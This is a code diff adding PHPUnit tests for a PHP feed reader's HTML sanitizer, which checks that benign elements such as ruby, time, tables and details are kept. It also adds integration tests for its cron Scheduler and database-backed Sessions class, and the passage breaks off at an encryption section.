+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<details>', $result);
+        $this->assertStringContainsString('<summary>', $result);
+        $this->assertStringContainsString('Content', $result);
+    }
+
+    public function test_sanitizes_ruby_notation(): void {
+        $html = '<ruby>漢 <rt>kan</rt></ruby>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<ruby>', $result);
+        $this->assertStringContainsString('<rt>', $result);
+    }
+
+    public function test_sanitizes_address_element(): void {
+        $html = '<address>123 Main St</address>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<address>', $result);
+        $this->assertStringContainsString('123 Main St', $result);
+    }
+
+    public function test_sanitizes_time_element(): void {
+        $html = '<time datetime="2026-01-01">New Year</time>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<time', $result);
+        $this->assertStringContainsString('New Year', $result);
+    }
+
+    public function test_sanitizes_var_element(): void {
+        $html = '<p>The variable <var>x</var> equals 5.</p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<var>', $result);
+        $this->assertStringContainsString('x', $result);
+    }
+
+    public function test_sanitizes_data_element(): void {
+        $html = '<data value="123">One hundred twenty-three</data>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<data', $result);
+    }
+
+    public function test_sanitizes_del_element(): void {
+        $html = '<p>Old <del>deleted text</del> new</p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<del>', $result);
+        $this->assertStringContainsString('deleted text', $result);
+    }
+
+    public function test_sanitizes_ins_element(): void {
+        $html = '<p>Old <ins>inserted text</ins> new</p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<ins>', $result);
+        $this->assertStringContainsString('inserted text', $result);
+    }
+
+    public function test_sanitizes_abbr_element(): void {
+        $html = '<p><abbr title="HyperText Markup Language">HTML</abbr> is great.</p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<abbr', $result);
+        $this->assertStringContainsString('HTML', $result);
+    }
+
+    public function test_sanitizes_q_element(): void {
+        $html = '<p>He said <q>short quote</q> and left.</p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<q>', $result);
+        $this->assertStringContainsString('short quote', $result);
+    }
+
+    public function test_sanitizes_kbd_element(): void {
+        $html = '<p>Press <kbd>Ctrl</kbd>+<kbd>C</kbd>.</p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<kbd>', $result);
+    }
+
+    public function test_sanitizes_code_element(): void {
+        $html = '<p>Use <code>print("hello")</code>.</p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<code>', $result);
+        $this->assertStringContainsString('print("hello")', $result);
+    }
+
+    public function test_sanitizes_pre_element(): void {
+        $html = '<pre>preformatted text</pre>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<pre>', $result);
+        $this->assertStringContainsString('preformatted text', $result);
+    }
+
+    public function test_sanitizes_small_element(): void {
+        $html = '<p><small>disclaimer text</small></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<small>', $result);
+        $this->assertStringContainsString('disclaimer text', $result);
+    }
+
+    public function test_sanitizes_big_element(): void {
+        $html = '<p><big>big text</big></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<big>', $result);
+        $this->assertStringContainsString('big text', $result);
+    }
+
+    public function test_sanitizes_u_element(): void {
+        $html = '<p><u>underlined text</u></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<u>', $result);
+        $this->assertStringContainsString('underlined text', $result);
+    }
+
+    public function test_sanitizes_bdi_element(): void {
+        $html = '<p><bdi>arabic text</bdi></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<bdi>', $result);
+    }
+
+    public function test_sanitizes_bdo_element(): void {
+        $html = '<p><bdo dir="rtl">right to left</bdo></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<bdo', $result);
+    }
+
+    public function test_sanitizes_acronym_element(): void {
+        $html = '<p><acronym title="HTML">HTML</acronym></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<acronym', $result);
+    }
+
+    public function test_sanitizes_main_element(): void {
+        $html = '<main><p>Main content</p></main>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<main>', $result);
+        $this->assertStringContainsString('Main content', $result);
+    }
+
+    public function test_sanitizes_noscript_element(): void {
+        $html = '<noscript>JavaScript required</noscript>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<noscript>', $result);
+    }
+
+    public function test_sanitizes_header_element(): void {
+        $html = '<header><h1>Header</h1></header>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<header>', $result);
+    }
+
+    public function test_sanitizes_footer_element(): void {
+        $html = '<footer><p>Footer text</p></footer>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<footer>', $result);
+    }
+
+    public function test_sanitizes_section_element(): void {
+        $html = '<section><h2>Section</h2><p>Content</p></section>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<section>', $result);
+    }
+
+    public function test_sanitizes_article_element(): void {
+        $html = '<article><h2>Article</h2><p>Content</p></article>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<article>', $result);
+    }
+
+    public function test_sanitizes_nav_element(): void {
+        $html = '<nav><ul><li>Link</li></ul></nav>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<nav>', $result);
+    }
+
+    public function test_sanitizes_aside_element(): void {
+        $html = '<aside><p>Sidebar content</p></aside>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<aside>', $result);
+    }
+
+    public function test_sanitizes_figcaption_element(): void {
+        $html = '<figure><img src="img.png"><figcaption>Caption</figcaption></figure>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<figcaption>', $result);
+        $this->assertStringContainsString('Caption', $result);
+    }
+
+    public function test_sanitizes_picture_element(): void {
+        $html = '<picture><source srcset="x.jpg"><img src="x.png"></picture>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<picture>', $result);
+    }
+
+    public function test_sanitizes_source_element(): void {
+        $html = '<video><source src="v.mp4" type="video/mp4"></video>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<source', $result);
+    }
+
+    public function test_sanitizes_track_element(): void {
+        $html = '<video><track src="subtitles.vtt" kind="subtitles"></video>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<track', $result);
+    }
+
+    public function test_sanitizes_col_element(): void {
+        $html = '<table><colgroup><col></colgroup></table>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<col>', $result);
+    }
+
+    public function test_sanitizes_colgroup_element(): void {
+        $html = '<table><colgroup><col></colgroup></table>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<colgroup>', $result);
+    }
+
+    public function test_sanitizes_tfoot_element(): void {
+        $html = '<table><tfoot><tr><td>Footer</td></tr></tfoot></table>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<tfoot>', $result);
+    }
+
+    public function test_sanitizes_caption_element(): void {
+        $html = '<table><caption>Table</caption></table>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<caption>', $result);
+    }
+
+    public function test_sanitizes_strike_element(): void {
+        $html = '<p><strike>strikethrough</strike></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<strike>', $result);
+    }
+
+    public function test_sanitizes_tt_element(): void {
+        $html = '<p><tt>teletype</tt></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<tt>', $result);
+    }
+
+    public function test_sanitizes_s_element(): void {
+        $html = '<p><s>strikethrough</s></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<s>', $result);
+    }
+
+    public function test_sanitizes_mark_element(): void {
+        $html = '<p><mark>highlighted</mark></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<mark>', $result);
+    }
+
+    public function test_sanitizes_samp_element(): void {
+        $html = '<p><samp>program output</samp></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<samp>', $result);
+    }
+
+    public function test_sanitizes_dfn_element(): void {
+        $html = '<p><dfn>definition</dfn></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<dfn>', $result);
+    }
+
+    public function test_sanitizes_wbr_element(): void {
+        $html = '<p>verylong<wbr>word</p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('wbr', $result);
+    }
+
+    public function test_sanitizes_font_element(): void {
+        $html = '<p><font color="red">red text</font></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<font>', $result);
+    }
+
+    public function test_sanitizes_center_element(): void {
+        $html = '<center>centered</center>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<center>', $result);
+    }
+
+    public function test_sanitizes_description_element(): void {
+        $html = '<dl><dt>Term</dt><description>Description</description></dl>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<description>', $result);
+    }
+
+    public function test_sanitizes_ruby_rp_rt(): void {
+        $html = '<ruby>漢<rp>(</rp><rt>kan</rt><rp>)</rp></ruby>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<rp>', $result);
+        $this->assertStringContainsString('<rt>', $result);
+    }
+
+    public function test_sanitizes_tr_element(): void {
+        $html = '<table><tr><td>Cell</td></tr></table>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<tr>', $result);
+    }
+
+    public function test_sanitizes_thead_element(): void {
+        $html = '<table><thead><tr><th>Header</th></tr></thead></table>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<thead>', $result);
+    }
+
+    public function test_sanitizes_tbody_element(): void {
+        $html = '<table><tbody><tr><td>Body</td></tr></tbody></table>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<tbody>', $result);
+    }
+
+    public function test_sanitizes_th_element(): void {
+        $html = '<table><tr><th>Header</th></tr></table>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<th>', $result);
+    }
+
+    public function test_sanitizes_td_element(): void {
+        $html = '<table><tr><td>Cell</td></tr></table>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<td>', $result);
+    }
+
+    public function test_sanitizes_summary_element(): void {
+        $html = '<details><summary>Toggle</summary>Content</details>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<summary>', $result);
+    }
+
+    public function test_sanitizes_figure_element(): void {
+        $html = '<figure><img src="img.png"><figcaption>Caption</figcaption></figure>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<figure>', $result);
+    }
+
+    public function test_sanitizes_details_element(): void {
+        $html = '<details><summary>Toggle</summary>Content</details>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<details>', $result);
+    }
+
+    public function test_sanitizes_video_element(): void {
+        $html = '<video src="video.mp4"></video>';
+        $result = Sanitizer::sanitize($html);
+
+        $this->assertStringContainsString("<video", $result);
+    }
+
+    public function test_sanitizes_blockquote_element(): void {
+        $html = '<blockquote cite="http://example.com">Quote</blockquote>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<blockquote', $result);
+    }
+
+}

--- a/tests_integration/SchedulerIntegrationTest.php
+++ b/tests_integration/SchedulerIntegrationTest.php
@@ -1,0 +1,350 @@
+<?php
+/** @group integration */
+final class SchedulerIntegrationTest extends DbTestCase {
+
+    // ── add_scheduled_task: success ──
+
+    public function test_add_scheduled_task_returns_true(): void {
+        $scheduler = new Scheduler('test-scheduler');
+
+        $result = $scheduler->add_scheduled_task(
+            'test_task',
+            '@daily',
+            function() { return 0; }
+        );
+
+        $this->assertTrue($result);
+    }
+
+    public function test_add_scheduled_task_stores_cron(): void {
+        $scheduler = new Scheduler('test-scheduler');
+
+        $scheduler->add_scheduled_task(
+            'hourly_task',
+            '0 * * * *',
+            function() { return 0; }
+        );
+
+        // Reflect to inspect private property
+        $ref = new ReflectionClass($scheduler);
+        $prop = $ref->getProperty('scheduled_tasks');
+        $prop->setAccessible(true);
+        $tasks = $prop->getValue($scheduler);
+
+        $this->assertArrayHasKey('hourly_task', $tasks);
+        $this->assertInstanceOf(Cron\CronExpression::class, $tasks['hourly_task']['cron']);
+        $this->assertIsCallable($tasks['hourly_task']['callback']);
+    }
+
+    public function test_add_scheduled_task_name_lowercased(): void {
+        $scheduler = new Scheduler('test-scheduler');
+
+        $scheduler->add_scheduled_task(
+            'UPPERCASE_TASK',
+            '@daily',
+            function() { return 0; }
+        );
+
+        $ref = new ReflectionClass($scheduler);
+        $prop = $ref->getProperty('scheduled_tasks');
+        $prop->setAccessible(true);
+        $tasks = $prop->getValue($scheduler);
+
+        $this->assertArrayHasKey('uppercase_task', $tasks);
+        $this->assertArrayNotHasKey('UPPERCASE_TASK', $tasks);
+    }
+
+    // ── add_scheduled_task: failure cases ──
+
+    public function test_add_scheduled_task_duplicate_returns_false(): void {
+        $scheduler = new Scheduler('test-scheduler');
+
+        $scheduler->add_scheduled_task(
+            'dup_task',
+            '@daily',
+            function() { return 0; }
+        );
+
+        // Suppress the user_error warning
+        set_error_handler(function() { return true; });
+
+        $result = $scheduler->add_scheduled_task(
+            'dup_task',
+            '@hourly',
+            function() { return 0; }
+        );
+
+        restore_error_handler();
+
+        $this->assertFalse($result);
+    }
+
+    public function test_add_scheduled_task_invalid_cron_returns_false(): void {
+        $scheduler = new Scheduler('test-scheduler');
+
+        set_error_handler(function() { return true; });
+
+        $result = $scheduler->add_scheduled_task(
+            'bad_cron_task',
+            'not-a-cron-expression',
+            function() { return 0; }
+        );
+
+        restore_error_handler();
+
+        $this->assertFalse($result);
+    }
+
+    // ── set_name ──
+
+    public function test_set_name(): void {
+        $scheduler = new Scheduler('original-name');
+
+        $ref = new ReflectionClass($scheduler);
+        $prop = $ref->getProperty('name');
+        $prop->setAccessible(true);
+
+        $this->assertEquals('original-name', $prop->getValue($scheduler));
+
+        $scheduler->set_name('new-name');
+        $this->assertEquals('new-name', $prop->getValue($scheduler));
+    }
+
+    // ── run_due_tasks: basic execution ──
+
+    public function test_run_due_tasks_executes_due_task(): void {
+		$scheduler = new Scheduler('test-scheduler');
+        $executed = false;
+
+        $scheduler->add_scheduled_task(
+            'due_task',
+            '@daily',
+            function() use (&$executed) {
+                $executed = true;
+                return 0;
+            }
+        );
+
+        // Insert a DB record with last_run far in the past so the task is due
+        $pdo = Db::pdo();
+        $pdo->exec("
+            INSERT INTO ttrss_scheduled_tasks (task_name, last_duration, last_rc, last_run, last_cron_expression)
+            VALUES ('due_task', 0, 0, '2020-01-01 00:00:00', '@daily')
+        ");
+
+        $scheduler->run_due_tasks();
+
+        $this->assertTrue($executed);
+    }
+
+    public function test_run_due_tasks_records_result_in_db(): void {
+        $scheduler = new Scheduler('test-scheduler');
+
+        $scheduler->add_scheduled_task(
+            'record_task',
+            '@daily',
+            function() { return 42; }
+        );
+
+        $pdo = Db::pdo();
+        $pdo->exec("
+            INSERT INTO ttrss_scheduled_tasks (task_name, last_duration, last_rc, last_run, last_cron_expression)
+            VALUES ('record_task', 0, 0, '2020-01-01 00:00:00', '@daily')
+        ");
+
+        $scheduler->run_due_tasks();
+
+        $row = $pdo->query("
+            SELECT last_rc, last_duration, last_cron_expression
+            FROM ttrss_scheduled_tasks
+            WHERE task_name = 'record_task'
+        ")->fetch();
+
+        $this->assertEquals(42, (int) $row['last_rc']);
+        $this->assertGreaterThanOrEqual(0, (int) $row['last_duration']);
+        // Cron aliases are expanded to full expressions
+        $this->assertMatchesRegularExpression('/^0\s+0\s+\*\s+\*\s+\*$/', $row['last_cron_expression']);
+    }
+
+    public function test_run_due_tasks_creates_db_record_for_new_task(): void {
+        $scheduler = new Scheduler('test-scheduler');
+
+        $scheduler->add_scheduled_task(
+            'new_task',
+            '@weekly',
+            function() { return 0; }
+        );
+
+        // No existing DB record — task should be created
+        $pdo = Db::pdo();
+        $countBefore = (int) $pdo->query("SELECT count(*) FROM ttrss_scheduled_tasks WHERE task_name = 'new_task'")->fetchColumn();
+        $this->assertEquals(0, $countBefore);
+
+        $scheduler->run_due_tasks();
+
+        $countAfter = (int) $pdo->query("SELECT count(*) FROM ttrss_scheduled_tasks WHERE task_name = 'new_task'")->fetchColumn();
+        $this->assertEquals(1, $countAfter);
+    }
+
+    public function test_run_due_tasks_skips_not_due(): void {
+        $scheduler = new Scheduler('test-scheduler');
+        $executed = false;
+
+        $scheduler->add_scheduled_task(
+            'not_due_task',
+            '@yearly',
+            function() use (&$executed) {
+                $executed = true;
+                return 0;
+            }
+        );
+
+        // Set last_run to yesterday — @yearly next run is in the future
+        $pdo = Db::pdo();
+        $pdo->exec("
+            INSERT INTO ttrss_scheduled_tasks (task_name, last_duration, last_rc, last_run, last_cron_expression)
+            VALUES ('not_due_task', 0, 0, NOW() - INTERVAL '1 day', '@yearly')
+        ");
+
+        $scheduler->run_due_tasks();
+
+        $this->assertFalse($executed);
+    }
+
+    // ── run_due_tasks: exception handling ──
+
+    public function test_run_due_tasks_catches_exception(): void {
+        $scheduler = new Scheduler('test-scheduler');
+
+        $scheduler->add_scheduled_task(
+            'failing_task',
+            '@daily',
+            function() {
+                throw new \RuntimeException('Task failed');
+            }
+        );
+
+        $pdo = Db::pdo();
+        $pdo->exec("
+            INSERT INTO ttrss_scheduled_tasks (task_name, last_duration, last_rc, last_run, last_cron_expression)
+            VALUES ('failing_task', 0, 0, '2020-01-01 00:00:00', '@daily')
+        ");
+
+        // Suppress warnings from user_error
+        set_error_handler(function() { return true; });
+
+        $scheduler->run_due_tasks();
+
+        restore_error_handler();
+
+        $row = $pdo->query("SELECT last_rc FROM ttrss_scheduled_tasks WHERE task_name = 'failing_task'")->fetch();
+        $this->assertEquals(Scheduler::TASK_RC_EXCEPTION, (int) $row['last_rc']);
+    }
+
+    // ── purge_orphaned_tasks ──
+
+    public function test_purge_orphaned_tasks_removes_old_orphaned(): void {
+        $scheduler = new Scheduler('test-scheduler');
+
+        // Register only 'keep_me' — 'orphan_old' and 'orphan_new' are not registered
+        $scheduler->add_scheduled_task(
+            'keep_me',
+            '@daily',
+            function() { return 0; }
+        );
+
+        $pdo = Db::pdo();
+
+        // Insert an old orphaned task (> 5 weeks ago)
+        $pdo->exec("
+            INSERT INTO ttrss_scheduled_tasks (task_name, last_duration, last_rc, last_run, last_cron_expression)
+            VALUES ('orphan_old', 0, 0, NOW() - INTERVAL '6 weeks', '@daily')
+        ");
+
+        // Insert a recent orphaned task (< 5 weeks ago) — should NOT be purged
+        $pdo->exec("
+            INSERT INTO ttrss_scheduled_tasks (task_name, last_duration, last_rc, last_run, last_cron_expression)
+            VALUES ('orphan_new', 0, 0, NOW() - INTERVAL '1 week', '@daily')
+        ");
+
+        $before = (int) $pdo->query("SELECT count(*) FROM ttrss_scheduled_tasks")->fetchColumn();
+
+        // Use reflection to invoke the private purge_orphaned_tasks method
+        $ref = new ReflectionClass($scheduler);
+        $purgeMethod = $ref->getMethod('purge_orphaned_tasks');
+        $purgeMethod->setAccessible(true);
+
+        $purgeResult = $scheduler->add_scheduled_task(
+            'purge_trigger',
+            '@daily',
+            function() use ($purgeMethod, $scheduler) {
+                return $purgeMethod->invoke($scheduler);
+            }
+        );
+        $this->assertTrue($purgeResult);
+
+        // Run the purge via run_due_tasks
+        $scheduler->run_due_tasks();
+
+        $after = (int) $pdo->query("SELECT count(*) FROM ttrss_scheduled_tasks")->fetchColumn();
+
+        // We added keep_me and purge_trigger records (+2) and deleted orphan_old (-1)
+        $this->assertEquals($before + 1, $after);
+
+        // Verify orphan_new still exists
+        $exists = (int) $pdo->query("SELECT count(*) FROM ttrss_scheduled_tasks WHERE task_name = 'orphan_new'")->fetchColumn();
+        $this->assertEquals(1, $exists);
+    }
+
+    public function test_purge_orphaned_tasks_returns_zero_on_success(): void {
+        $scheduler = new Scheduler('test-scheduler');
+
+        $scheduler->add_scheduled_task(
+            'keep_me',
+            '@daily',
+            function() { return 0; }
+        );
+
+        // Use reflection to invoke the private purge_orphaned_tasks method
+        $ref = new ReflectionClass($scheduler);
+        $purgeMethod = $ref->getMethod('purge_orphaned_tasks');
+        $purgeMethod->setAccessible(true);
+
+        $purgeResult = $scheduler->add_scheduled_task(
+            'purge_trigger',
+            '@daily',
+            function() use ($purgeMethod, $scheduler) {
+                return $purgeMethod->invoke($scheduler);
+            }
+        );
+        $this->assertTrue($purgeResult);
+
+        $scheduler->run_due_tasks();
+
+        $row = Db::pdo()->query("SELECT last_rc FROM ttrss_scheduled_tasks WHERE task_name = 'purge_trigger'")->fetch();
+        $this->assertEquals(0, (int) $row['last_rc']);
+    }
+
+    // ── Default scheduler (singleton) ──
+
+    public function test_default_scheduler_has_purge_task(): void {
+        $scheduler = Scheduler::getInstance();
+
+        $ref = new ReflectionClass($scheduler);
+        $prop = $ref->getProperty('scheduled_tasks');
+        $prop->setAccessible(true);
+        $tasks = $prop->getValue($scheduler);
+
+        $this->assertArrayHasKey('purge_orphaned_scheduled_tasks', $tasks);
+    }
+
+    public function test_default_scheduler_name(): void {
+        $scheduler = Scheduler::getInstance();
+
+        $ref = new ReflectionClass($scheduler);
+        $prop = $ref->getProperty('name');
+        $prop->setAccessible(true);
+
+        $this->assertEquals(Scheduler::DEFAULT_NAME, $prop->getValue($scheduler));
+    }
+}

--- a/tests_integration/SessionsIntegrationTest.php
+++ b/tests_integration/SessionsIntegrationTest.php
@@ -1,0 +1,599 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Integration tests for the CRUD lifecycle of the Sessions class.
+ *
+ * Exercises the full path through PDO → PostgreSQL for session persistence:
+ * write, read, exists, destroy, and auto-create on read miss.
+ */
+final class SessionsIntegrationTest extends DbTestCase {
+
+    /**
+     * Disable encryption and set a reasonable session lifetime for all tests.
+     */
+    protected function setUp(): void {
+        parent::setUp();
+
+        // Default: encryption off for plaintext CRUD tests
+        Config::set(Config::ENCRYPTION_KEY, '');
+        // Session lifetime of 1 hour so sessions don't expire during tests
+        Config::set(Config::SESSION_COOKIE_LIFETIME, '3600');
+
+        // Ensure multi-user mode for validate_session tests
+        Config::set(Config::SINGLE_USER_MODE, 'false');
+    }
+
+    /**
+     * Set up a valid admin session (uid=1 with correct pwd_hash).
+     * The admin user is created by the schema with pwd_hash = SHA1('password').
+     */
+    private function setValidAdminSession(): void {
+        $_SESSION['uid'] = 1;
+        $_SESSION['pwd_hash'] = 'SHA1:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8';
+    }
+
+    /**
+     * Set up a session for a non-existent user.
+     */
+    private function setNonExistentUserSession(): void {
+        $_SESSION['uid'] = 99999;
+        unset($_SESSION['pwd_hash']);
+    }
+
+    /**
+     * Set up a session for a disabled user.
+     * @return int The ID of the created disabled user.
+     */
+    private function createDisabledUser(): int {
+        $pdo = Db::pdo();
+        $pwdHash = 'SHA1:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'; // SHA1('password')
+
+        $pdo->exec("
+            INSERT INTO ttrss_users (login, pwd_hash, access_level)
+            VALUES ('disabled_test_user', '{$pwdHash}', " . UserHelper::ACCESS_LEVEL_DISABLED . ")
+        ");
+
+        $uid = (int) $pdo->query(
+            "SELECT currval(pg_get_serial_sequence('ttrss_users', 'id'))"
+        )->fetchColumn();
+
+        $_SESSION['uid'] = $uid;
+        $_SESSION['pwd_hash'] = $pwdHash;
+
+        return $uid;
+    }
+
+    /**
+     * Clean up any disabled test users.
+     */
+    private function cleanupDisabledUsers(): void {
+        Db::pdo()->exec("DELETE FROM ttrss_users WHERE login = 'disabled_test_user'");
+    }
+
+    /**
+     * Reset the session to a clean state (no uid, no pwd_hash).
+     */
+    private function setGuestSession(): void {
+        unset($_SESSION['uid']);
+        unset($_SESSION['pwd_hash']);
+    }
+
+    /**
+     * Generate a valid encryption key and enable it for the test.
+     */
+    private function enableEncryption(): void {
+        $key = bin2hex(Crypt::generate_key());
+        Config::set(Config::ENCRYPTION_KEY, $key);
+    }
+
+    /**
+     * Query the raw stored data from the database for a given session ID.
+     */
+    private function getStoredData(string $id): ?string {
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare('SELECT data FROM ttrss_sessions WHERE id = ?');
+        $sth->execute([$id]);
+        $row = $sth->fetch();
+
+        return $row ? $row['data'] : null;
+    }
+
+    /**
+     * Decode the base64 DB value back to its raw form.
+     */
+    private function decodeStoredData(string $b64Data): string {
+        return base64_decode($b64Data);
+    }
+
+    // ── exists() ──────────────────────────────────────────────────────────────
+
+    public function test_exists_returns_false_for_nonexistent_session(): void {
+        $sessions = new Sessions();
+        $nonexistentId = 'nonexistent-session-id-' . uniqid();
+
+        $this->assertFalse(
+            $sessions::exists($nonexistentId),
+            'exists() should return false for a session that has never been written'
+        );
+    }
+
+    public function test_exists_returns_true_after_write(): void {
+        $sessions = new Sessions();
+        $id = 'exists-test-id-' . uniqid();
+        $data = 'test-data-for-exists';
+
+        $sessions->write($id, $data);
+
+        $this->assertTrue(
+            $sessions::exists($id),
+            'exists() should return true after a successful write'
+        );
+    }
+
+    // ── write() ───────────────────────────────────────────────────────────────
+
+    public function test_write_stores_data_in_database(): void {
+        $sessions = new Sessions();
+        $id = 'write-store-test-' . uniqid();
+        $data = 'hello world';
+
+        $result = $sessions->write($id, $data);
+
+        $this->assertTrue($result, 'write() should return true on success');
+
+        // Verify in database directly
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare('SELECT data FROM ttrss_sessions WHERE id = ?');
+        $sth->execute([$id]);
+        $row = $sth->fetch();
+
+        $this->assertNotNull($row, 'Session row should exist in database');
+        // Data is base64-encoded in the DB
+        $this->assertEquals(
+            base64_encode($data),
+            $row['data'],
+            'Stored data should be base64-encoded version of the original'
+        );
+    }
+
+    public function test_write_overwrites_existing_session(): void {
+        $sessions = new Sessions();
+        $id = 'write-overwrite-test-' . uniqid();
+        $data1 = 'original data';
+        $data2 = 'updated data';
+
+        $sessions->write($id, $data1);
+        $sessions->write($id, $data2);
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare('SELECT data FROM ttrss_sessions WHERE id = ?');
+        $sth->execute([$id]);
+        $row = $sth->fetch();
+
+        $this->assertEquals(
+            base64_encode($data2),
+            $row['data'],
+            'Second write should overwrite the first'
+        );
+    }
+
+    // ── read() ────────────────────────────────────────────────────────────────
+
+    public function test_read_returns_written_data(): void {
+        $sessions = new Sessions();
+        $id = 'read-roundtrip-' . uniqid();
+        $data = 'session payload';
+
+        $sessions->write($id, $data);
+        $result = $sessions->read($id);
+
+        $this->assertSame($data, $result, 'read() should return the exact data that was written');
+    }
+
+    public function test_read_returns_empty_string_for_new_session(): void {
+        $sessions = new Sessions();
+        $id = 'read-auto-create-' . uniqid();
+
+        $result = $sessions->read($id);
+
+        $this->assertSame('', $result, 'read() for a new session should return empty string');
+        $this->assertTrue(
+            $sessions::exists($id),
+            'read() should auto-create the session in the database'
+        );
+    }
+
+    public function test_read_with_unicode_data(): void {
+        $sessions = new Sessions();
+        $id = 'read-unicode-' . uniqid();
+        $data = 'こんにちは世界 🌍 Привет мир 你好世界';
+
+        $sessions->write($id, $data);
+        $result = $sessions->read($id);
+
+        $this->assertSame($data, $result, 'Unicode data should roundtrip correctly');
+    }
+
+    public function test_read_with_large_payload(): void {
+        $sessions = new Sessions();
+        $id = 'read-large-' . uniqid();
+        $data = str_repeat('A', 50000); // 50 KB
+
+        $sessions->write($id, $data);
+        $result = $sessions->read($id);
+
+        $this->assertSame($data, $result, 'Large payload should roundtrip correctly');
+    }
+
+    public function test_read_returns_false_on_failure(): void {
+        // This is hard to trigger in normal operation, but we can verify
+        // the return type is correct. read() returns false|string.
+        $sessions = new Sessions();
+        $id = 'read-type-test-' . uniqid();
+
+        // Auto-create returns '' (string), not false
+        $result = $sessions->read($id);
+        $this->assertIsString($result, 'read() should return a string (even if empty)');
+    }
+
+    // ── destroy() ─────────────────────────────────────────────────────────────
+
+    public function test_destroy_removes_session_from_database(): void {
+        $sessions = new Sessions();
+        $id = 'destroy-test-' . uniqid();
+        $data = 'to-be-destroyed';
+
+        $sessions->write($id, $data);
+        $this->assertTrue($sessions::exists($id), 'Session should exist before destroy');
+
+        $result = $sessions->destroy($id);
+
+        $this->assertTrue($result, 'destroy() should return true on success');
+        $this->assertFalse(
+            $sessions::exists($id),
+            'Session should not exist after destroy'
+        );
+    }
+
+    public function test_destroy_nonexistent_session_returns_true(): void {
+        $sessions = new Sessions();
+        $id = 'destroy-missing-' . uniqid();
+
+        // destroy() uses DELETE which returns true even if 0 rows affected
+        $result = $sessions->destroy($id);
+
+        $this->assertTrue($result, 'destroy() should return true even for non-existent sessions');
+    }
+
+    // ── Full lifecycle ────────────────────────────────────────────────────────
+
+    public function test_full_session_lifecycle(): void {
+        $sessions = new Sessions();
+        $id = 'lifecycle-' . uniqid();
+
+        // 1. New session does not exist
+        $this->assertFalse($sessions::exists($id));
+
+        // 2. read() auto-creates an empty session
+        $this->assertSame('', $sessions->read($id));
+        $this->assertTrue($sessions::exists($id));
+
+        // 3. write() stores data
+        $sessions->write($id, 'step-3-data');
+        $this->assertSame('step-3-data', $sessions->read($id));
+
+        // 4. write() updates existing data
+        $sessions->write($id, 'step-4-data');
+        $this->assertSame('step-4-data', $sessions->read($id));
+
+        // 5. destroy() removes the session
+        $sessions->destroy($id);
+        $this->assertFalse($sessions::exists($id));
+    }
+
+    // ── Encryption ──────────────────────────────────────────────────────────
